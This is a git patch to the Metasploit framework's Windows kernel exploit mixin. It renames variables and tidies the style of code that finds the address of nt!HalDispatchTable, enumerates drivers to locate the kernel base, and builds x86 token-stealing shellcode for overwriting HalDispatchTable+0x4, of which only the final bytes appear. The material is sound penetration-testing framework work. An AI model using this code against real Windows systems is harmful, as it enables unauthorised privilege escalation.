From 43a5120696e69264191c47a442ea9dc5bf20f56d Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Sat, 2 Aug 2014 08:08:59 -0700 Subject: [PATCH] Cleanup the WindowsKernel mixin --- lib/msf/core/exploit/local/windows_kernel.rb | 45 ++++++++++---------- 1 file changed, 22 insertions(+), 23 deletions(-) diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb index 8cdc7d88f2..5c5664d544 100644 --- a/lib/msf/core/exploit/local/windows_kernel.rb +++ b/lib/msf/core/exploit/local/windows_kernel.rb @@ -2,7 +2,6 @@ module Msf module Exploit::Local::WindowsKernel - # # Find the address of nt!HalDispatchTable. # @@ -12,24 +11,24 @@ module Exploit::Local::WindowsKernel kernel_info = find_sys_base(nil) vprint_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}") - hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1) - if hKernel['return'] == 0 - print_error("Failed to load #{kernel_info[1]} (error: #{hKernel['GetLastError']})") + h_kernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1) + if h_kernel['return'] == 0 + print_error("Failed to load #{kernel_info[1]} (error: #{h_kernel['GetLastError']})") return nil end - hKernel = hKernel['return'] + h_kernel = h_kernel['return'] - halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable") - if halDispatchTable['return'] == 0 - print_error("Failed to retrieve the address of HalDispatchTable (error: #{halDispatchTable['GetLastError']})") + hal_dispatch_table = session.railgun.kernel32.GetProcAddress(h_kernel, 'HalDispatchTable') + if hal_dispatch_table['return'] == 0 + print_error("Failed to retrieve the address of nt!HalDispatchTable (error: #{hal_dispatch_table['GetLastError']})") return nil end - halDispatchTable = halDispatchTable['return'] + hal_dispatch_table = hal_dispatch_table['return'] - halDispatchTable -= hKernel - halDispatchTable += kernel_info[0] - vprint_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}") - halDispatchTable + hal_dispatch_table -= h_kernel + hal_dispatch_table += kernel_info[0] + vprint_status("HalDisPatchTable Address: 0x#{hal_dispatch_table.to_s(16)}") + hal_dispatch_table end # @@ -48,28 +47,28 @@ module Exploit::Local::WindowsKernel 'EnumDeviceDrivers', 'BOOL', [ - ["PBLOB", "lpImageBase", "out"], - ["DWORD", "cb", "in"], - ["PDWORD", "lpcbNeeded", "out"] + %w(PBLOB lpImageBase out), + %w(DWORD cb in), + %w(PDWORD lpcbNeeded out) ]) session.railgun.add_function( 'psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ - ["LPVOID", "ImageBase", "in"], - ["PBLOB", "lpBaseName", "out"], - ["DWORD", "nSize", "in"] + %w(LPVOID ImageBase in), + %w(PBLOB lpBaseName out), + %w(DWORD nSize in) ]) end results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4) - addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("V*") + addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('V*') addresses.each do |address| results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48) current_drvname = results['lpBaseName'][0..results['return'] - 1] - if drvname == nil + if drvname.nil? if current_drvname.downcase.include?('krnl') return [address, current_drvname] end @@ -81,7 +80,8 @@ module Exploit::Local::WindowsKernel # # Generate x86 token stealing shellcode suitable for use when overwriting the - # halDispatchTable+0x4. + # pointer at nt!HalDispatchTable+0x4. The shellcode preserves the edx and ebx + # registers. # # @param target [Hash] The target information containing the offsets to _KPROCESS, # _TOKEN, _UPID and _APLINKS. @@ -108,6 +108,5 @@ module Exploit::Local::WindowsKernel tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel! tokenstealing end - end end